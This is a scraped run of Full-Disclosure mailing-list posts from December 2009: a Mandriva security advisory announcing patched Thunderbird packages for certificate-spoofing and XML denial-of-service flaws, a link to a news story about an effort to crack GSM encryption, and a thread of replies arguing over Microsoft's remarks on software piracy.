wj8DBQFLFtLXgo//xpeLCaoRAt9KAJ0RNt0N4ZxiDMiG/r9PCWGcYcDyJwCg+Gkn 62mQcZWLl3024vnWbCPJtYI= =5/ko -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:217-3 ] mozilla-thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:217-3 http://www.mandriva.com/security/ ___ Package : mozilla-thunderbird Date: December 3, 2009 Affected: 2008.0 ___ Problem Description: A number of security vulnerabilities have been discovered in Mozilla Thunderbird: Security issues in thunderbird could lead to a man-in-the-middle attack via a spoofed X.509 certificate (CVE-2009-2408). A vulnerability was found in xmltok_impl.c (expat) that with specially crafted XML could be exploited and lead to a denial of service attack. Related to CVE-2009-2625 (CVE-2009-3720). This update provides the latest version of Thunderbird which are not vulnerable to these issues. Update: Packages for 2008.0 are being provided due to extended support for Corporate products. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720 http://www.mozilla.org/security/announce/2009/mfsa2009-42.html https://bugs.gentoo.org/show_bug.cgi?id=280615 ___ Updated Packages: Mandriva Linux 2008.0: 22ce174eb2b68d124ca745a618ab0526 2008.0/i586/mozilla-thunderbird-2.0.0.23-0.1mdv2008.0.i586.rpm 78d161d683f079f629f0361f7ebe23cd 2008.0/i586/mozilla-thunderbird-af-2.0.0.23-0.1mdv2008.0.i586.rpm c8995e1c756e7fb460c1cb76d53e3860 2008.0/i586/mozilla-thunderbird-be-2.0.0.23-0.1mdv2008.0.i586.rpm f7311f7ba1fc2dc875c4330ac7ea98a3 2008.0/i586/mozilla-thunderbird-bg-2.0.0.23-0.1mdv2008.0.i586.rpm c1e2f98134e0593c8fd4034e6495604d 2008.0/i586/mozilla-thunderbird-ca-2.0.0.23-0.1mdv2008.0.i586.rpm ca29f94b7ce5b5e96f8e316b38bb2bf8 2008.0/i586/mozilla-thunderbird-cs-2.0.0.23-0.1mdv2008.0.i586.rpm 4c167d2cf99c88b4fafc3a493449bb8f 2008.0/i586/mozilla-thunderbird-da-2.0.0.23-0.1mdv2008.0.i586.rpm fcc68e8736ed0fcc9710703bb2be6ef7 2008.0/i586/mozilla-thunderbird-de-2.0.0.23-0.1mdv2008.0.i586.rpm c9c7d119dc3be64f6f22183046a284ee 2008.0/i586/mozilla-thunderbird-devel-2.0.0.23-0.1mdv2008.0.i586.rpm 6ce999e22e5426386557a63a5bbe86e3 2008.0/i586/mozilla-thunderbird-el-2.0.0.23-0.1mdv2008.0.i586.rpm c657104140656877b3f0f590c5f81dce 2008.0/i586/mozilla-thunderbird-en_GB-2.0.0.23-0.1mdv2008.0.i586.rpm 330d7a5b51baa23e0c57d7925344e093 2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.23-0.1mdv2008.0.i586.rpm 1e93bfc29c672524b0e96acaaedf10c9 2008.0/i586/mozilla-thunderbird-enigmail-ar-2.0.0.23-0.1mdv2008.0.i586.rpm 6745c465e515e701f38c7941df45117d 2008.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.23-0.1mdv2008.0.i586.rpm bc2d663ca48187e61cb7c15f8a839f69 2008.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.23-0.1mdv2008.0.i586.rpm 9b1a530bde521eddf79ecc80ec4cf7e3 2008.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.23-0.1mdv2008.0.i586.rpm 52349bca12ed712719c7c3b89c7d9a52 2008.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.23-0.1mdv2008.0.i586.rpm f3217909797b4f1f6e7426599f8a28db 2008.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.23-0.1mdv2008.0.i586.rpm 97bf57da4695aa653b8359e27668f458 2008.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.23-0.1mdv2008.0.i586.rpm 9f53acbc7fa384c5a57813b748a86ce3 2008.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.23-0.1mdv2008.0.i586.rpm 6bd93597bfc9852c4187cffe263981de 2008.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.23-0.1mdv2008.0.i586.rpm 03b20c0dcd02a8544e0656883f0f5ec3 2008.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.23-0.1mdv2008.0.i586.rpm d851c78235bf4e333849bb374d285f15 2008.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.23-0.1mdv2008.0.i586.rpm 54f25e693156d25b5cd5dd8be6eb66d5 2008.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.23-0.1mdv2008.0.i586.rpm fd9166aa4861d39c17a1b2a1d7b27c3d 2008.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.23-0.1mdv2008.0.i586.rpm e85fc5e881499ff052f697a7a982c39f 2008.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.23-0.1mdv2008.0.i586.rpm a2f9f68cc5c14013b53a400148db7d51 2008.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.23-0.1mdv2008.0.i586.rpm da1f17cc161f3ab46b10f2c77c4ea143 2008.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.23-0.1mdv2008.0.i586.rpm 966d4f5f3941b70906a8973ae7a4711e 2008.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.23-0.1mdv2008.0.i586.rpm e3a8abdbbb825834daf555a74fd48016 2008.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.23-0.1mdv2008.0.i586.rpm 490a51bbe35b27c1a1b7cd8b198d6602 2008.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.23-0.1mdv2008.0.i586.rpm 5b5df29e7dc10963fe6df47dd4e8365b 2008.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.23-0.1mdv2008.0.i586.rpm ba8dd3cf9260a800dd15cc
Re: [Full-disclosure] Microsoft: ‘Piracy no longe r poses a threat to us’
2009/12/3 dramacrat : > How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it > four? > I guess this is their way of competing with free software... making > their software free (yes, yes, money-free vs freedom-free, i know) except to > those thick enough (or lawsuit vulnerable enough, ie governments > and corporations) to pay. Or to those who feel software developers should be compensated for their time and efforts. It's why some of us buy new copies of OpenBSD when they make a release, or why some of us have a purchased copy for each production device we deploy. It's the reason we have a valid, purchased license of Windows [XP Pro | 7 Ultimate | whatever previous version] for each machine that's running it. If we're using and benefiting from the code, why shouldn't the developers get compensated? Not everyone has the same feeling of entitlement and greed that you just displayed and I daresay that neither makes us "lawsuit vulnerable" nor "thick". kmw -- Beware the leader who bangs the drums of war in order to whip the citizenry into a patriotic fervor, for patriotism is indeed a double-edged sword. It both emboldens the blood, just as it narrows the mind. And when the drums of war have reached a fever pitch and the blood boils with hate and the mind has closed, the leader will have no need in seizing the rights of the citizenry. Rather, the citizenry, infused with fear and blinded by patriotism, will offer up all of their rights unto the leader and gladly so - Unattributed, post 9/11 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Open-Source Effort to Hack GSM
http://spectrum.ieee.org/telecom/wireless/open-source-effort-to-hack-gsm .."Karsten Nohl, chief research scientist with H4RDW4RE, a Sunnyvale, Calif.-based security research firm, is mounting what could be the most ambitious attempt yet to compromise the GSM phone system, which is used by over 3 billion people around the world. Others have cracked the A5/1 encryption technology used in GSM before, but their results have remained secret. However, Nohl, who earned a Ph.D. in computer science at the University of Virginia and is a member of Germany's Chaos Computer Club (CCC), intends to go one big step further: By the end of the year, he plans to make the keys available to everyone on the Internet."... -Mike ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’
Yeah right. What a cheap psychology.. "If you have cracked win 7, then your bank accounts can be stolen - So buy the original" -- netinfinity ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft: Piracy no longer poses a threat to us¹
From: "Ivan ." Date: Thu, 3 Dec 2009 16:24:01 +1100 To: Full-disclosure Subject: [Full-disclosure] Microsoft: Piracy no longer poses a threat to us¹ In a recent interview, managing director of Microsoft Philippines Inc., John Bessey, has claimed that piracy no longer poses a threat to the software giant. http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 Heh..make an operating system WORTH pirating, then we¹ll talk. If the pirates aren¹t interested in your software, you know you have a problem ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft: ‘Piracy no longe r poses a threat to us’
Hahaha. How many legit copies of Windows 7 Ultimate have they sold? Three? Or was it four? I guess this is their way of competing with free software... making *their* software free (yes, yes, money-free vs freedom-free, i know) except to those thick enough (or lawsuit vulnerable enough, ie governments and corporations) to pay. 2009/12/3 S/U/N > Sure, dude, " please just STEAL my soft, that's gonna kill competitors" > IE: what happend to PaintShopPro vs Photoshop? > > Cluster #[[ Ivan . ]] possibly emitted, @Time > [[ 03/12/2009 06:24 ]] The Following #String ** > > In a recent interview, managing director of Microsoft Philippines Inc., > John Bessey, has claimed that piracy no longer poses a threat to the > software giant. > > http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’
Sure, dude, " please just STEAL my soft, that's gonna kill competitors" IE: what happend to PaintShopPro vs Photoshop? Cluster #[[ Ivan . ]] possibly emitted, @Time [[ 03/12/2009 06:24 ]] The Following #String ** In a recent interview, managing director of Microsoft Philippines Inc., John Bessey, has claimed that piracy no longer poses a threat to the software giant. http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/